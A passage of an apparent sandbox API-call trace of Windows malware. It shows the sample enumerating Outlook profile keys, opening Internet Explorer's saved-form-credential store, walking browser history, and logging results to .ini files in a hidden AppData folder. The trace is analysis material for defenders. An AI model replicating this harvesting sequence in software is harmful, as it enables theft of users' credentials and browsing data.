NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.765] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.766] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.766] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.766] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x1a, ByteOffset=0xdd5fc*=1674, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.766] NtClose (Handle=0x150) returned 0x0 [0236.767] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.767] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.767] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.767] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.767] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x22, ByteOffset=0xdd5fc*=1700, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.768] NtClose (Handle=0x150) returned 0x0 [0236.769] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.769] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.769] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.769] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.769] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.769] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x20, ByteOffset=0xdd5fc*=1734, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.770] NtClose (Handle=0x150) returned 0x0 [0236.771] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.771] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x150, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.771] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.771] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.771] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x14, ByteOffset=0xdd5fc*=1766, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.772] NtClose (Handle=0x150) returned 0x0 [0236.773] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x8000001a [0236.773] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd71c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.773] NtCreateFile (in: FileHandle=0xdd73c, DesiredAccess=0x12019f, ObjectAttributes=0xdd704*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd724, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd73c*=0x150, IoStatusBlock=0xdd724*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.774] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.774] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdd724, FileInformation=0xdd67c, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd724, FileInformation=0xdd67c) returned 0x0 [0236.774] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd724, Buffer=0x705c78*, Length=0x4, ByteOffset=0xdd694*=1786, Key=0x0 | out: IoStatusBlock=0xdd724, Buffer=0x705c78*) returned 0x0 [0236.774] NtClose (Handle=0x150) returned 0x0 [0236.775] NtClose (Handle=0x140) returned 0x0 [0236.775] NtEnumerateKey (in: KeyHandle=0x138, Index=0x3, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0236.775] NtClose (Handle=0x138) returned 0x0 [0236.775] NtEnumerateKey (in: KeyHandle=0xb4, Index=0xa, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0236.775] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc48e7c6d33441458035ee20beefe18a", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x138) returned 0x0 [0236.776] NtEnumerateKey (in: KeyHandle=0x138, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0236.776] NtClose (Handle=0x138) returned 0x0 [0236.776] NtEnumerateKey (in: KeyHandle=0xb4, Index=0xb, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0236.776] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\e57f6d0b27b6134693ca7113a4ab34a6", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x138) returned 0x0 [0236.776] NtEnumerateKey (in: KeyHandle=0x138, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0236.776] NtClose (Handle=0x138) returned 0x0 [0236.776] NtEnumerateKey (in: KeyHandle=0xb4, Index=0xc, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0236.776] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f35c115766b7c94cb080da6869ae8f9d", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x138) returned 0x0 [0236.777] NtEnumerateKey (in: KeyHandle=0x138, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0236.777] NtClose (Handle=0x138) returned 0x0 [0236.777] NtEnumerateKey (in: KeyHandle=0xb4, Index=0xd, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0236.777] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x138) returned 0x0 [0236.777] NtEnumerateKey (in: KeyHandle=0x138, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0236.777] NtClose (Handle=0x138) returned 0x0 [0236.777] NtEnumerateKey (in: KeyHandle=0xb4, Index=0xe, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x8000001a [0236.777] NtCreateKey (in: KeyHandle=0xdea2c, DesiredAccess=0x20219, ObjectAttributes=0xde3bc*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook_2016\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea2c*=0x138) returned 0x0 [0236.780] NtEnumerateKey (in: KeyHandle=0x138, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x8000001a [0236.804] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xddb14 | out: TokenHandle=0xddb14*=0x140) returned 0x0 [0236.804] NtQueryInformationToken (in: TokenHandle=0x140, TokenInformationClass=0x1, TokenInformation=0xdd30c, TokenInformationLength=0x400, ReturnLength=0xddb0c | out: TokenInformation=0xdd30c, ReturnLength=0xddb0c) returned 0x0 [0236.805] ConvertSidToStringSidW (in: Sid=0xdd314*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xddb10 | out: StringSid=0xddb10*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0236.805] NtClose (Handle=0x140) returned 0x0 [0236.809] NtCreateKey (in: KeyHandle=0xdea28, DesiredAccess=0x20219, ObjectAttributes=0xddb10*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea28*=0x140) returned 0x0 [0236.809] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0xdda0c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.809] NtCreateFile (in: FileHandle=0xdda2c, DesiredAccess=0x120089, ObjectAttributes=0xdd9f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdda14, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdda2c*=0x0, IoStatusBlock=0xdda14*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0236.810] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.810] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0xdda24, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.810] NtCreateFile (in: FileHandle=0xdda44, DesiredAccess=0x12019f, ObjectAttributes=0xdda0c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdda2c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdda44*=0x150, IoStatusBlock=0xdda2c*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0236.812] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.845] NtQueryInformationFile (in: FileHandle=0x150, IoStatusBlock=0xdda2c, FileInformation=0xdd984, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdda2c, FileInformation=0xdd984) returned 0x0 [0236.846] NtWriteFile (in: FileHandle=0x150, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdda2c, Buffer=0x705c78*, Length=0x28, ByteOffset=0xdd99c*=0, Key=0x0 | out: IoStatusBlock=0xdda2c, Buffer=0x705c78*) returned 0x0 [0236.847] NtClose (Handle=0x150) returned 0x0 [0236.870] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ole32.dll", BaseAddress=0xdda38 | out: BaseAddress=0xdda38*=0x753d0000) returned 0x0 [0236.946] LdrGetProcedureAddress (in: BaseAddress=0x753d0000, Name="CoUninitialize", Ordinal=0x0, ProcedureAddress=0xdda1c | out: ProcedureAddress=0xdda1c*=0x75c492a0) returned 0x0 [0236.949] LdrGetProcedureAddress (in: BaseAddress=0x753d0000, Name="CoCreateInstance", Ordinal=0x0, ProcedureAddress=0xdda08 | out: ProcedureAddress=0xdda08*=0x75c70060) returned 0x0 [0236.953] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1f4400) returned 0x730c020 [0237.022] CoInitialize (pvReserved=0x0) returned 0x0 [0237.112] CoCreateInstance (in: rclsid=0xddb20*(Data1=0x3c374a40, Data2=0xbae4, Data3=0x11cf, Data4=([0]=0xbf, [1]=0x7d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x69, [6]=0x46, [7]=0xee)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xddb30*(Data1=0xafa0dc11, Data2=0xc313, Data3=0x11d0, Data4=([0]=0x83, [1]=0x1a, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0xae, [7]=0x38)), ppv=0xddb48 | out: ppv=0xddb48*=0x716708) returned 0x0 [0237.489] IUrlHistoryStg:EnumUrls (in: This=0x716708, ppenum=0xddb44 | out: ppenum=0xddb44*=0x717f90) returned 0x0 [0237.495] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0xdf2e0 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.896] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.897] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.897] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.898] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.898] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.898] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.898] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.898] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.898] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.898] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.899] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.899] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.899] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.899] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.899] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.899] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.900] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.903] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.903] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.904] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.904] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.904] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.904] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.904] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.904] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.904] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.905] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.905] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.905] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.905] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.905] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0237.905] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.053] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.056] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.057] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.057] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.057] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.057] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.057] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0238.058] IEnumSTATURL:Next (in: This=0x717f90, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 